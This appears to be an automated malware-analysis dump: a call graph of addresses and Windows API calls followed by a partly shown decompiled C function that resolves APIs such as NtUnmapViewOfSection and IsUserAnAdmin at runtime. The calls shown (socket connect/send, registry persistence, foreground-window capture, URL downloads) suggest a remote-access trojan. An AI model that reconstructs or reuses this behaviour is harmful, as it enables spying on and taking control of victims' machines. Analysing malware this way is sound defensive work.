47579 409d29 _wcslen 47578->47579 47580 409d34 47579->47580 47581 409d4b 47579->47581 47583 40d83d 32 API calls 47580->47583 47582 40d83d 32 API calls 47581->47582 47584 409d53 47582->47584 47585 409d3c 47583->47585 47586 401f13 28 API calls 47584->47586 47587 401f13 28 API calls 47585->47587 47588 409d61 47586->47588 47589 409d46 47587->47589 47590 401f09 11 API calls 47588->47590 47592 401f09 11 API calls 47589->47592 47591 409d69 47590->47591 48042 409082 28 API calls 47591->48042 47593 409da0 47592->47593 48027 40a030 47593->48027 47596 409d7b 48043 403014 47596->48043 47600 401f13 28 API calls 47601 409d90 47600->47601 47602 401f09 11 API calls 47601->47602 47602->47589 48091 40417e 47603->48091 47608 403014 28 API calls 47609 41b107 47608->47609 47610 401f09 11 API calls 47609->47610 47611 41b110 47610->47611 47612 401f09 11 API calls 47611->47612 47613 40f02c 47612->47613 47613->47330 47615 4130ce RegQueryValueExA RegCloseKey 47614->47615 47616 40f0ed 47614->47616 47615->47616 47616->47203 47616->47359 47618 40f19b 47617->47618 47619 4135ed RegDeleteValueW 47617->47619 47618->47197 47619->47618 47621 40db64 47620->47621 47622 4130ad 3 API calls 47621->47622 47623 40db6b 47622->47623 47624 40db8a 47623->47624 48183 401707 47623->48183 47628 414b37 47624->47628 47626 40db78 48186 413425 RegCreateKeyA 47626->48186 47629 4020df 11 API calls 47628->47629 47630 414b4b 47629->47630 48200 41b348 47630->48200 47633 4020df 11 API calls 47634 414b61 47633->47634 47635 401e65 22 API calls 47634->47635 47636 414b6f 47635->47636 47637 43b4a1 _strftime 39 API calls 47636->47637 47638 414b7c 47637->47638 47639 414b81 Sleep 47638->47639 47640 414b8e 47638->47640 47639->47640 47641 402093 28 API calls 47640->47641 47642 414b9d 47641->47642 47643 401e65 22 API calls 47642->47643 47644 414ba6 47643->47644 47645 4020f6 28 API calls 47644->47645 47646 414bb1 47645->47646 47647 41b8b0 28 API calls 47646->47647 47648 414bb9 47647->47648 48204 40489e WSAStartup 47648->48204 47650 414bc3 47651 401e65 22 API calls 47650->47651 47652 414bcc 47651->47652 47653 401e65 22 API calls 47652->47653 47712 414c4b 47652->47712 47654 414be5 47653->47654 47655 401e65 22 API calls 47654->47655 47657 414bf6 47655->47657 47656 4020f6 28 API calls 47656->47712 47659 401e65 22 API calls 47657->47659 47658 41b8b0 28 API calls 47658->47712 47660 414c07 47659->47660 47662 401e65 22 API calls 47660->47662 47661 406b45 28 API calls 47661->47712 47663 414c18 47662->47663 47665 401e65 22 API calls 47663->47665 47664 401fe2 28 API calls 47664->47712 47666 414c29 47665->47666 47667 401e65 22 API calls 47666->47667 47668 414c3b 47667->47668 48364 40473d 88 API calls 47668->48364 47671 414d99 WSAGetLastError 48365 41c576 30 API calls 47671->48365 47676 414da9 47681 401e65 22 API calls 47676->47681 47682 401e8d 11 API calls 47676->47682 47683 43b4a1 _strftime 39 API calls 47676->47683 47676->47712 47714 402093 28 API calls 47676->47714 47715 41af84 79 API calls 47676->47715 47716 41567e CreateThread 47676->47716 47717 401fd8 11 API calls 47676->47717 47718 401f09 11 API calls 47676->47718 48366 4052fd 28 API calls 47676->48366 48367 40aec6 84 API calls 47676->48367 48368 404e26 98 API calls 47676->48368 47679 401e65 22 API calls 47679->47712 47680 40531e 28 API calls 47680->47712 47681->47676 47682->47676 47685 4156dc Sleep 47683->47685 47684 406383 28 API calls 47684->47712 47685->47676 47686 402093 28 API calls 47686->47712 47687 41af84 79 API calls 47687->47712 47690 408f83 28 API calls 47690->47712 47692 4132a6 3 API calls 47692->47712 47693 413154 31 API calls 47693->47712 47694 40417e 28 API calls 47694->47712 47697 401e65 22 API calls 47698 415046 GetTickCount 47697->47698 48312 41b623 47698->48312 47701 41b623 28 API calls 47701->47712 47704 41b7b3 28 API calls 47704->47712 47706 402f10 28 API calls 47706->47712 47707 402ea1 28 API calls 47707->47712 47709 401fd8 11 API calls 47709->47712 47710 401f09 11 API calls 47710->47712 47712->47656 47712->47658 47712->47661 47712->47664 47712->47671 47712->47676 47712->47679 47712->47680 47712->47684 47712->47686 47712->47687 47712->47690 47712->47692 47712->47693 47712->47694 47712->47697 47712->47701 47712->47704 47712->47706 47712->47707 47712->47709 47712->47710 48205 414af6 47712->48205 48211 40482d 47712->48211 48218 404f51 47712->48218 48233 4048c8 connect 47712->48233 48293 41b275 47712->48293 48296 4141ca 47712->48296 48299 441861 47712->48299 48303 40db92 47712->48303 48309 41b6d7 47712->48309 48317 41b57b GetLastInputInfo GetTickCount 47712->48317 48318 41b52b 47712->48318 48323 40f6da GetLocaleInfoA 47712->48323 48326 402f31 47712->48326 48331 404aa1 47712->48331 48346 404c10 47712->48346 47714->47676 47715->47676 47716->47676 47717->47676 47718->47676 47719->47115 47720->47123 47721->47127 47724 4020df 11 API calls 47723->47724 47725 406b51 47724->47725 47726 4032a0 28 API calls 47725->47726 47727 406b6e 47726->47727 47727->47149 47729 413121 RegQueryValueExA RegCloseKey 47728->47729 47730 40e9ad 47728->47730 47729->47730 47730->47146 47730->47163 47731->47154 47732->47180 47733->47173 47734->47165 47735->47182 48550 401f86 47736->48550 47739 40d879 48554 41b049 29 API calls 47739->48554 47740 40d8ae 47743 41ba4c 2 API calls 47740->47743 47741 40d9a2 GetLongPathNameW 47745 40417e 28 API calls 47741->47745 47742 40d86f 47742->47741 47746 40d8b3 47743->47746 47748 40d9b7 47745->47748 47749 40d8b7 47746->47749 47750 40d909 47746->47750 47747 40d882 47751 401f13 28 API calls 47747->47751 47752 40417e 28 API calls 47748->47752 47754 40417e 28 API calls 47749->47754 47753 40417e 28 API calls 47750->47753 47755 40d88c 47751->47755 47756 40d9c6 47752->47756 47757 40d917 47753->47757 47758 40d8c5 47754->47758 47759 401f09 11 API calls 47755->47759 48557 40dbda 28 API calls 47756->48557 47763 40417e 28 API calls 47757->47763 47764 40417e 28 API calls 47758->47764 47759->47742 47761 40d9d9 48558 402fa5 28 API calls 47761->48558 47766 40d92d 47763->47766 47767 40d8db 47764->47767 47765 40d9e4 48559 402fa5 28 API calls 47765->48559 48556 402fa5 28 API calls 47766->48556 48555 402fa5 28 API calls 47767->48555 47771 40d8e6 47775 401f13 28 API calls 47771->47775 47772 40d9ee 47776 401f09 11 API calls 47772->47776 47773 40d938 47774 401f13 28 API calls 47773->47774 47777 40d943 47774->47777 47778 40d8f1 47775->47778 47779 40d9f8 47776->47779 47781 401f09 11 API calls 47777->47781 47782 401f09 11 API calls 47778->47782 47780 401f09 11 API calls 47779->47780 47783 40da01 47780->47783 47784 40d94c 47781->47784 47785 40d8fa 47782->47785 47786 401f09 11 API calls 47783->47786 47787 401f09 11 API calls 47784->47787 47788 401f09 11 API calls 47785->47788 47789 40da0a 47786->47789 47787->47755 47788->47755 47790 401f09 11 API calls 47789->47790 47791 40da13 47790->47791 47792 401f09 11 API calls 47791->47792 47793 40da1c 47792->47793 47793->47239 47794->47250 47795->47273 47797 4132cc RegQueryValueExA RegCloseKey 47796->47797 47798 4132f0 47796->47798 47797->47798 47798->47232 47799->47265 47803 433f0d 47800->47803 47801 43b715 new 21 API calls 47801->47803 47802 40eeda 47802->47303 47803->47801 47803->47802 48560 442960 7 API calls 2 library calls 47803->48560 48561 434626 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47803->48561 48562 434c8b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47803->48562 47807->47335 47808->47323 47810->47367 47811->47172 47814 40f1e7 47813->47814 47815 41af5a LoadResource LockResource SizeofResource 47813->47815 47816 43b715 47814->47816 47815->47814 47821 445b29 __Getctype 47816->47821 47817 445b67 47833 43ffbd 20 API calls _free 47817->47833 47819 445b52 RtlAllocateHeap 47820 445b65 47819->47820 47819->47821 47820->47408 47821->47817 47821->47819 47832 442960 7 API calls 2 library calls 47821->47832 47824 4020bf 47823->47824 47834 4023ce 47824->47834 47826 4020ca 47838 40250a 47826->47838 47828 4020d9 47828->47411 47830 4020b7 28 API calls 47829->47830 47831 406d13 47830->47831 47831->47418 47832->47821 47833->47820 47835 4023d8 47834->47835 47836 402428 47834->47836 47835->47836 47845 4027a7 11 API calls std::_Deallocate 47835->47845 47836->47826 47839 40251a 47838->47839 47840 402520 47839->47840 47841 402535 47839->47841 47846 402569 47840->47846 47856 4028e8 47841->47856 47844 402533 47844->47828 47845->47836 47867 402888 47846->47867 47848 40257d 47849 402592 47848->47849 47850 4025a7 47848->47850 47872 402a34 22 API calls 47849->47872 47852 4028e8 28 API calls 47850->47852 47855 4025a5 47852->47855 47853 40259b 47873 4029da 22 API calls 47853->47873 47855->47844 47857 4028f1 47856->47857 47858 402953 47857->47858 47860 4028fb 47857->47860 47881 4028a4 22 API calls 47858->47881 47862 402904 47860->47862 47863 402917 47860->47863 47875 402cae 47862->47875 47865 402915 47863->47865 47866 4023ce 11 API calls 47863->47866 47865->47844 47866->47865 47869 402890 47867->47869 47868 402898 47868->47848 47869->47868 47874 402ca3 22 API calls 47869->47874 47872->47853 47873->47855 47876 402cb8 __EH_prolog 47875->47876 47882 402e54 22 API calls 47876->47882 47878 4023ce 11 API calls 47880 402d92 47878->47880 47879 402d24 47879->47878 47880->47865 47882->47879 47884 4020e7 47883->47884 47885 4023ce 11 API calls 47884->47885 47886 4020f2 47885->47886 47886->47446 47892 40423a 47887->47892 47890->47446 47891->47427 47893 404243 47892->47893 47894 4023ce 11 API calls 47893->47894 47895 40424e 47894->47895 47896 402569 28 API calls 47895->47896 47897 4041b5 47896->47897 47897->47446 47898->47450 47899->47454 47900->47456 47903 4032aa 47902->47903 47904 4028e8 28 API calls 47903->47904 47905 4032c9 47903->47905 47904->47905 47905->47466 47907 4051fb 47906->47907 47916 405274 47907->47916 47909 405208 47909->47469 47911 402061 47910->47911 47912 4023ce 11 API calls 47911->47912 47913 40207b 47912->47913 47921 40267a 47913->47921 47917 405282 47916->47917 47920 4028a4 22 API calls 47917->47920 47922 40268b 47921->47922 47923 4023ce 11 API calls 47922->47923 47924 40208d 47923->47924 47924->47472 47925->47474 47926->47485 47928 402246 47927->47928 47928->47490 47930 41ad66 47929->47930 47931 41ba59 GetCurrentProcess IsWow64Process 47929->47931 47933 413154 RegOpenKeyExA 47930->47933 47931->47930 47932 41ba70 47931->47932 47932->47930 47934 413182 RegQueryValueExA RegCloseKey 47933->47934 47935 4131ac 47933->47935 47934->47935 47936 402093 28 API calls 47935->47936 47937 4131c1 47936->47937 47937->47496 47938->47504 47940 40b781 47939->47940 47945 402252 47940->47945 47942 40b78c 47949 40b7a1 47942->47949 47944 40b79b 47944->47515 47946 40225c 47945->47946 47947 4022ac 47945->47947 47946->47947 47956 402779 11 API calls std::_Deallocate 47946->47956 47947->47942 47950 40b7db 47949->47950 47951 40b7ad 47949->47951 47968 4028a4 22 API calls 47950->47968 47957 4027e6 47951->47957 47955 40b7b7 47955->47944 47956->47947 47958 4027ef 47957->47958 47959 402851 47958->47959 47960 4027f9 47958->47960 47970 4028a4 22 API calls 47959->47970 47963 402802 47960->47963 47966 402815 47960->47966 47969 402aea 28 API calls __EH_prolog 47963->47969 47965 402813 47965->47955 47966->47965 47967 402252 11 API calls 47966->47967 47967->47965 47969->47965 47971->47524 47973 402347 47972->47973 47974 402252 11 API calls 47973->47974 47975 4023c7 47974->47975 47975->47524 47977 4024f9 47976->47977 47978 40250a 28 API calls 47977->47978 47979 4020b1 47978->47979 47979->47244 47996 43ea1f 47980->47996 47982 43a860 48002 43a1c7 35 API calls 2 library calls 47982->48002 47983 43a825 47983->47982 47984 43a83a 47983->47984 47995 43a83f __cftof 47983->47995 48001 43ffbd 20 API calls _free 47984->48001 47988 43a86c 47989 43a89b 47988->47989 48003 43b444 39 API calls __Tolower 47988->48003 47992 43a907 47989->47992 48004 43b3c6 20 API calls 2 library calls 47989->48004 48005 43b3c6 20 API calls 2 library calls 47992->48005 47993 43a9ce _strftime 47993->47995 48006 43ffbd 20 API calls _free 47993->48006 47995->47553 47997 43ea37 47996->47997 47998 43ea24 47996->47998 47997->47983 48007 43ffbd 20 API calls _free 47998->48007 48000 43ea29 __cftof 48000->47983 48001->47995 48002->47988 48003->47988 48004->47992 48005->47993 48006->47995 48007->48000 48014 401fb0 48008->48014 48010 402f1e 48011 402055 11 API calls 48010->48011 48012 402f2d 48011->48012 48012->47567 48013->47570 48017 4025f0 48014->48017 48016 401fbd 48016->48010 48018 402888 22 API calls 48017->48018 48019 402602 48018->48019 48020 402672 48019->48020 48021 402629 48019->48021 48026 4028a4 22 API calls 48020->48026 48024 4028e8 28 API calls 48021->48024 48025 40263b 48021->48025 48024->48025 48025->48016 48028 40a04e 48027->48028 48029 4130f7 3 API calls 48028->48029 48030 40a055 48029->48030 48031 40a083 48030->48031 48032 40a069 48030->48032 48035 408f83 28 API calls 48031->48035 48033 409dc2 48032->48033 48034 40a06e 48032->48034 48033->47296 48048 408f83 48034->48048 48037 40a091 48035->48037 48055 40a0a0 85 API calls 48037->48055 48041 40a081 48041->48033 48042->47596 48068 403222 48043->48068 48045 403022 48072 403262 48045->48072 48049 408f99 48048->48049 48050 402252 11 API calls 48049->48050 48051 408fb3 48050->48051 48056 404267 48051->48056 48053 408fc1 48054 40a154 29 API calls 48053->48054 48054->48041 48055->48033 48057 402888 22 API calls 48056->48057 48058 40427b 48057->48058 48059 404290 48058->48059 48060 4042a5 48058->48060 48066 4042df 22 API calls 48059->48066 48062 4027e6 28 API calls 48060->48062 48064 4042a3 48062->48064 48063 404299 48067 402c48 22 API calls 48063->48067 48064->48053 48066->48063 48067->48064 48069 40322e 48068->48069 48078 403618 48069->48078 48071 40323b 48071->48045 48073 40326e 48072->48073 48074 402252 11 API calls 48073->48074 48075 403288 48074->48075 48076 402336 11 API calls 48075->48076 48077 403031 48076->48077 48077->47600 48079 403626 48078->48079 48080 403644 48079->48080 48081 40362c 48079->48081 48082 40365c 48080->48082 48083 40369e 48080->48083 48089 4036a6 28 API calls 48081->48089 48087 4027e6 28 API calls 48082->48087 48088 403642 48082->48088 48090 4028a4 22 API calls 48083->48090 48087->48088 48088->48071 48089->48088 48092 404186 48091->48092 48093 402252 11 API calls 48092->48093 48094 404191 48093->48094 48102 4041bc 48094->48102 48097 4042fc 48113 404353 48097->48113 48099 40430a 48100 403262 11 API calls 48099->48100 48101 404319 48100->48101 48101->47608 48103 4041c8 48102->48103 48106 4041d9 48103->48106 48105 40419c 48105->48097 48107 4041e9 48106->48107 48108 404206 48107->48108 48109 4041ef 48107->48109 48110 4027e6 28 API calls 48108->48110 48111 404267 28 API calls 48109->48111 48112 404204 48110->48112 48111->48112 48112->48105 48114 40435f 48113->48114 48117 404371 48114->48117 48116 40436d 48116->48099 48118 40437f 48117->48118 48119 404385 48118->48119 48120 40439e 48118->48120 48181 4034e6 28 API calls 48119->48181 48121 402888 22 API calls 48120->48121 48122 4043a6 48121->48122 48124 404419 48122->48124 48125 4043bf 48122->48125 48182 4028a4 22 API calls 48124->48182 48127 4027e6 28 API calls 48125->48127 48136 40439c 48125->48136 48127->48136 48136->48116 48181->48136 48189 43a4aa 48183->48189 48187 413467 48186->48187 48188 41343d RegSetValueExA RegCloseKey 48186->48188 48187->47624 48188->48187 48192 43a42b 48189->48192 48191 40170d 48191->47626 48193 43a43a 48192->48193 48194 43a44e 48192->48194 48198 43ffbd 20 API calls _free 48193->48198 48197 43a43f __alldvrm __cftof 48194->48197 48199 448366 11 API calls 2 library calls 48194->48199 48197->48191 48198->48197 48199->48197 48203 41b38e ctype ___scrt_get_show_window_mode 48200->48203 48201 402093 28 API calls 48202 414b56 48201->48202 48202->47633 48203->48201 48204->47650 48206 414b05 48205->48206 48207 414b0f WSASetLastError 48205->48207 48369 414993 29 API calls ___std_exception_copy 48206->48369 48207->47712 48210 414b0a 48210->48207 48212 404846 socket 48211->48212 48213 404839 48211->48213 48215 404860 CreateEventW 48212->48215 48216 404842 48212->48216 48370 40489e WSAStartup 48213->48370 48215->47712 48216->47712 48217 40483e 48217->48212 48217->48216 48219 404f65 48218->48219 48221 404fea 48218->48221 48220 404f6e 48219->48220 48222 404fc0 CreateEventA CreateThread 48219->48222 48223 404f7d GetLocalTime 48219->48223 48220->48222 48221->47712 48222->48221 48372 405150 48222->48372 48224 41b623 28 API calls 48223->48224 48225 404f91 48224->48225 48371 4052fd 28 API calls 48225->48371 48234 404a1b 48233->48234 48235 4048ee 48233->48235 48236 40497e 48234->48236 48237 404a21 WSAGetLastError 48234->48237 48235->48236 48240 40531e 28 API calls 48235->48240 48256 404923 48235->48256 48236->47712 48237->48236 48238 404a31 48237->48238 48241 404a36 48238->48241 48244 404932 48238->48244 48245 40490f 48240->48245 48381 41c576 30 API calls 48241->48381 48243 40492b 48243->48244 48247 404941 48243->48247 48248 402093 28 API calls 48244->48248 48249 402093 28 API calls 48245->48249 48246 404a40 48382 4052fd 28 API calls 48246->48382 48258 404950 48247->48258 48259 404987 48247->48259 48252 404a80 48248->48252 48250 40491e 48249->48250 48253 41af84 79 API calls 48250->48253 48255 402093 28 API calls 48252->48255 48253->48256 48260 404a8f 48255->48260 48376 42067e 27 API calls 48256->48376 48264 402093 28 API calls 48258->48264 48378 42145e 53 API calls 48259->48378 48261 41af84 79 API calls 48260->48261 48261->48236 48267 40495f 48264->48267 48266 40498f 48269 4049c4 48266->48269 48270 404994 48266->48270 48271 402093 28 API calls 48267->48271 48380 420824 28 API calls 48269->48380 48274 402093 28 API calls 48270->48274 48275 40496e 48271->48275 48277 4049a3 48274->48277 48278 41af84 79 API calls 48275->48278 48276 4049cc 48280 4049f9 CreateEventW CreateEventW 48276->48280 48282 402093 28 API calls 48276->48282 48281 402093 28 API calls 48277->48281 48279 404973 48278->48279 48377 41e12f DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48279->48377 48280->48236 48283 4049b2 48281->48283 48285 4049e2 48282->48285 48286 41af84 79 API calls 48283->48286 48287 402093 28 API calls 48285->48287 48288 4049b7 48286->48288 48289 4049f1 48287->48289 48379 420ad0 51 API calls 48288->48379 48291 41af84 79 API calls 48289->48291 48292 4049f6 48291->48292 48292->48280 48383 41b24b GlobalMemoryStatusEx 48293->48383 48295 41b28a 48295->47712 48384 41418d 48296->48384 48300 44186d 48299->48300 48414 44165d 48300->48414 48302 44188e 48302->47712 48304 40dbae 48303->48304 48305 4130ad 3 API calls 48304->48305 48307 40dbb5 48305->48307 48306 40dbcd 48306->47712 48307->48306 48308 4130f7 3 API calls 48307->48308 48308->48306 48310 4020b7 28 API calls 48309->48310 48311 41b6ec 48310->48311 48311->47712 48313 441861 20 API calls 48312->48313 48314 41b647 48313->48314 48315 402093 28 API calls 48314->48315 48316 41b655 48315->48316 48316->47712 48317->47712 48319 4368a0 ___scrt_get_show_window_mode 48318->48319 48320 41b54a GetForegroundWindow GetWindowTextW 48319->48320 48321 40417e 28 API calls 48320->48321 48322 41b574 48321->48322 48322->47712 48324 402093 28 API calls 48323->48324 48325 40f6ff 48324->48325 48325->47712 48327 4020df 11 API calls 48326->48327 48328 402f3d 48327->48328 48329 4032a0 28 API calls 48328->48329 48330 402f59 48329->48330 48330->47712 48332 404ab4 48331->48332 48419 40520c 48332->48419 48334 404ac9 ctype 48335 404b40 WaitForSingleObject 48334->48335 48336 404b20 48334->48336 48338 404b56 48335->48338 48337 404b32 send 48336->48337 48339 404b7b 48337->48339 48425 420a58 53 API calls 48338->48425 48341 401fd8 11 API calls 48339->48341 48343 404b83 48341->48343 48342 404b69 SetEvent 48342->48339 48344 401fd8 11 API calls 48343->48344 48345 404b8b 48344->48345 48345->47712 48347 4020df 11 API calls 48346->48347 48348 404c27 48347->48348 48349 4020df 11 API calls 48348->48349 48356 404c30 48349->48356 48350 43b715 new 21 API calls 48350->48356 48352 4020b7 28 API calls 48352->48356 48353 404ca1 48452 404e26 98 API calls 48353->48452 48354 401fe2 28 API calls 48354->48356 48356->48350 48356->48352 48356->48353 48356->48354 48358 401fd8 11 API calls 48356->48358 48434 404b96 48356->48434 48440 404cc3 48356->48440 48357 404ca8 48359 401fd8 11 API calls 48357->48359 48358->48356 48360 404cb1 48359->48360 48361 401fd8 11 API calls 48360->48361 48362 404cba 48361->48362 48362->47712 48364->47712 48365->47676 48367->47676 48368->47676 48369->48210 48370->48217 48375 40515c 101 API calls 48372->48375 48374 405159 48375->48374 48376->48243 48377->48236 48378->48266 48379->48279 48380->48276 48381->48246 48383->48295 48387 414160 48384->48387 48388 414175 ___scrt_initialize_default_local_stdio_options 48387->48388 48391 43f178 48388->48391 48394 43beb0 48391->48394 48395 43bef0 48394->48395 48396 43bed8 48394->48396 48395->48396 48397 43bef8 48395->48397 48409 43ffbd 20 API calls _free 48396->48409 48410 43a1c7 35 API calls 2 library calls 48397->48410 48400 43bf08 48411 43c636 20 API calls 2 library calls 48400->48411 48401 4349bb TranslatorGuardHandler 5 API calls 48403 414183 48401->48403 48403->47712 48404 43bf80 48412 43cca4 50 API calls 3 library calls 48404->48412 48407 43bf8b 48413 43c6a0 20 API calls _free 48407->48413 48408 43bedd __cftof 48408->48401 48409->48408 48410->48400 48411->48404 48412->48407 48413->48408 48415 441674 48414->48415 48417 4416ab __cftof 48415->48417 48418 43ffbd 20 API calls _free 48415->48418 48417->48302 48418->48417 48420 405214 48419->48420 48421 4023ce 11 API calls 48420->48421 48422 40521f 48421->48422 48426 405234 48422->48426 48424 40522e 48424->48334 48425->48342 48427 405240 48426->48427 48428 40526e 48426->48428 48429 4028e8 28 API calls 48427->48429 48433 4028a4 22 API calls 48428->48433 48432 40524a 48429->48432 48432->48424 48435 404ba0 WaitForSingleObject 48434->48435 48436 404bcd recv 48434->48436 48453 420a94 53 API calls 48435->48453 48438 404be0 48436->48438 48438->48356 48439 404bbc SetEvent 48439->48438 48441 4020df 11 API calls 48440->48441 48448 404cde 48441->48448 48442 404e13 48443 401fd8 11 API calls 48442->48443 48444 404e1c 48443->48444 48444->48356 48445 4041a2 28 API calls 48445->48448 48446 401fe2 28 API calls 48446->48448 48447 401fd8 11 API calls 48447->48448 48448->48442 48448->48445 48448->48446 48448->48447 48449 401fc0 28 API calls 48448->48449 48450 4020f6 28 API calls 48448->48450 48451 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 48449->48451 48450->48448 48451->48448 48454 4156f7 48451->48454 48452->48357 48453->48439 48455 4020f6 28 API calls 48454->48455 48456 415719 SetEvent 48455->48456 48457 41572e 48456->48457 48458 4041a2 28 API calls 48457->48458 48459 415748 48458->48459 48460 4020f6 28 API calls 48459->48460 48461 415758 48460->48461 48462 4020f6 28 API calls 48461->48462 48463 41576a 48462->48463 48464 41b8b0 28 API calls 48463->48464 48465 415773 48464->48465 48466 415793 GetTickCount 48465->48466 48467 4158f5 48465->48467 48530 4158e6 48465->48530 48469 41b623 28 API calls 48466->48469 48467->48530 48531 415909 48467->48531 48468 401e8d 11 API calls 48470 416b29 48468->48470 48471 4157a4 48469->48471 48473 401fd8 11 API calls 48470->48473 48533 41b57b GetLastInputInfo GetTickCount 48471->48533 48475 416b35 48473->48475 48476 401fd8 11 API calls 48475->48476 48478 416b41 48476->48478 48477 4157b0 48479 41b623 28 API calls 48477->48479 48480 4157bb 48479->48480 48481 41b52b 30 API calls 48480->48481 48482 4157c9 48481->48482 48534 41b7b3 48482->48534 48485 401e65 22 API calls 48486 4157e5 48485->48486 48487 402f31 28 API calls 48486->48487 48488 4157f3 48487->48488 48538 402ea1 48488->48538 48491 402f10 28 API calls 48492 415811 48491->48492 48493 402ea1 28 API calls 48492->48493 48494 415820 48493->48494 48495 402f10 28 API calls 48494->48495 48496 41582c 48495->48496 48497 402ea1 28 API calls 48496->48497 48498 415836 48497->48498 48499 404aa1 60 API calls 48498->48499 48500 415845 48499->48500 48501 401fd8 11 API calls 48500->48501 48502 41584e 48501->48502 48503 401fd8 11 API calls 48502->48503 48504 41585a 48503->48504 48505 401fd8 11 API calls 48504->48505 48506 415866 48505->48506 48507 401fd8 11 API calls 48506->48507 48508 415872 48507->48508 48509 401fd8 11 API calls 48508->48509 48510 41587e 48509->48510 48511 401fd8 11 API calls 48510->48511 48512 41588a 48511->48512 48513 401f09 11 API calls 48512->48513 48514 415896 48513->48514 48515 401fd8 11 API calls 48514->48515 48516 41589f 48515->48516 48517 401fd8 11 API calls 48516->48517 48518 4158a8 48517->48518 48519 401e65 22 API calls 48518->48519 48520 4158b3 48519->48520 48521 43b4a1 _strftime 39 API calls 48520->48521 48522 4158c0 48521->48522 48523 4158c5 48522->48523 48524 4158eb 48522->48524 48526 4158d3 48523->48526 48527 4158de 48523->48527 48525 401e65 22 API calls 48524->48525 48525->48467 48547 404ff4 81 API calls 48526->48547 48528 404f51 104 API calls 48527->48528 48528->48530 48530->48468 48548 4050e4 83 API calls 48531->48548 48532 4158d9 48532->48530 48533->48477 48535 41b7c0 48534->48535 48536 4020b7 28 API calls 48535->48536 48537 4157d7 48536->48537 48537->48485 48539 402eb0 48538->48539 48540 402ef2 48539->48540 48545 402ee7 48539->48545 48541 401fb0 28 API calls 48540->48541 48542 402ef0 48541->48542 48543 402055 11 API calls 48542->48543 48544 402f09 48543->48544 48544->48491 48549 403365 28 API calls 48545->48549 48547->48532 48548->48532 48549->48542 48551 401f8e 48550->48551 48552 402252 11 API calls 48551->48552 48553 401f99 48552->48553 48553->47739 48553->47740 48553->47742 48554->47747 48555->47771 48556->47773 48557->47761 48558->47765 48559->47772 48560->47803 48565 40f5cb 48563->48565 48564 4130f7 3 API calls 48564->48565 48565->48564 48566 40f5fd 48565->48566 48567 40f66f 48565->48567 48569 40f65f Sleep 48565->48569 48568 408f83 28 API calls 48566->48568 48566->48569 48572 41b6f3 28 API calls 48566->48572 48579 401f09 11 API calls 48566->48579 48581 402093 28 API calls 48566->48581 48585 41331d 14 API calls 48566->48585 48590 40ce9f 111 API calls ___scrt_get_show_window_mode 48566->48590 48591 4133c2 14 API calls 48566->48591 48570 408f83 28 API calls 48567->48570 48568->48566 48569->48565 48573 40f67a 48570->48573 48572->48566 48574 41b6f3 28 API calls 48573->48574 48575 40f686 48574->48575 48592 4133c2 14 API calls 48575->48592 48578 40f699 48580 401f09 11 API calls 48578->48580 48579->48566 48582 40f6a5 48580->48582 48581->48566 48583 402093 28 API calls 48582->48583 48584 40f6b6 48583->48584 48586 41331d 14 API calls 48584->48586 48585->48566 48587 40f6c9 48586->48587 48593 412659 TerminateProcess WaitForSingleObject 48587->48593 48589 40f6d1 ExitProcess 48591->48566 48592->48578 48593->48589 48594 415916 48609 41ae15 48594->48609 48596 41591f 48597 4020f6 28 API calls 48596->48597 48598 41592e 48597->48598 48599 404aa1 60 API calls 48598->48599 48600 41593a 48599->48600 48601 401fd8 11 API calls 48600->48601 48602 415943 48601->48602 48603 401e8d 11 API calls 48602->48603 48604 416b29 48603->48604 48605 401fd8 11 API calls 48604->48605 48606 416b35 48605->48606 48607 401fd8 11 API calls 48606->48607 48608 416b41 48607->48608 48610 4020df 11 API calls 48609->48610 48611 41ae23 48610->48611 48612 43b715 new 21 API calls 48611->48612 48613 41ae33 InternetOpenW InternetOpenUrlW 48612->48613 48614 41ae5a InternetReadFile 48613->48614 48619 41ae7d 48614->48619 48615 41aeaa InternetCloseHandle InternetCloseHandle 48617 41aebc 48615->48617 48616 4020b7 28 API calls 48616->48619 48617->48596 48618 401fd8 11 API calls 48618->48619 48619->48614 48619->48615 48619->48616 48619->48618 48620 40165e 48621 401666 48620->48621 48624 401669 48620->48624 48622 4016a8 48623 433f08 new 22 API calls 48622->48623 48625 40169c 48623->48625 48624->48622 48626 401696 48624->48626 48627 433f08 new 22 API calls 48626->48627 48627->48625

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E0041C5E5() {
                    				struct HINSTANCE__* _t1;
                    				_Unknown_base(*)()* _t2;
                    				_Unknown_base(*)()* _t4;
                    				_Unknown_base(*)()* _t8;
                    				_Unknown_base(*)()* _t16;
                    				_Unknown_base(*)()* _t22;
                    				_Unknown_base(*)()* _t28;
                    				_Unknown_base(*)()* _t32;
                    				struct HINSTANCE__* _t33;
                    				_Unknown_base(*)()* _t36;
                    				CHAR* _t43;
                    				CHAR* _t45;
                    				CHAR* _t46;
                    				CHAR* _t47;
                    				CHAR* _t48;
                    				CHAR* _t49;
                    
                    				_t45 = "GetProcessImageFileNameW";
                    				_t1 = LoadLibraryA("Psapi.dll"); // executed
                    				_t2 = GetProcAddress(_t1, _t45);
                    				 *0x473b0c = _t2;
                    				if(_t2 == 0) {
                    					 *0x473b0c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t45);
                    				}
                    				_t4 = GetProcAddress(GetModuleHandleA("shcore"), "SetProcessDpiAwareness");
                    				 *0x473ae8 = _t4;
                    				if(_t4 == 0) {
                    					 *0x473aec = GetProcAddress(GetModuleHandleA("user32"), "SetProcessDpiAware");
                    				}
                    				GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
                    				_t8 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                    				_t46 = "kernel32";
                    				 *0x473afc = _t8;
                    				 *0x473b04 = GetProcAddress(GetModuleHandleA(_t46), "IsWow64Process");
                    				 *0x473b08 = GetProcAddress(GetModuleHandleA(_t46), "GetComputerNameExW");
                    				 *0x473af8 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
                    				_t16 = GetProcAddress(GetModuleHandleA(_t46), "SetProcessDEPPolicy");
                    				_t47 = "user32";
                    				 *0x473af0 = _t16;
                    				 *0x473ae0 = GetProcAddress(GetModuleHandleA(_t47), "EnumDisplayDevicesW");
                    				 *0x473ae4 = GetProcAddress(GetModuleHandleA(_t47), "EnumDisplayMonitors");
                    				_t22 = GetProcAddress(GetModuleHandleA(_t47), "GetMonitorInfoW");
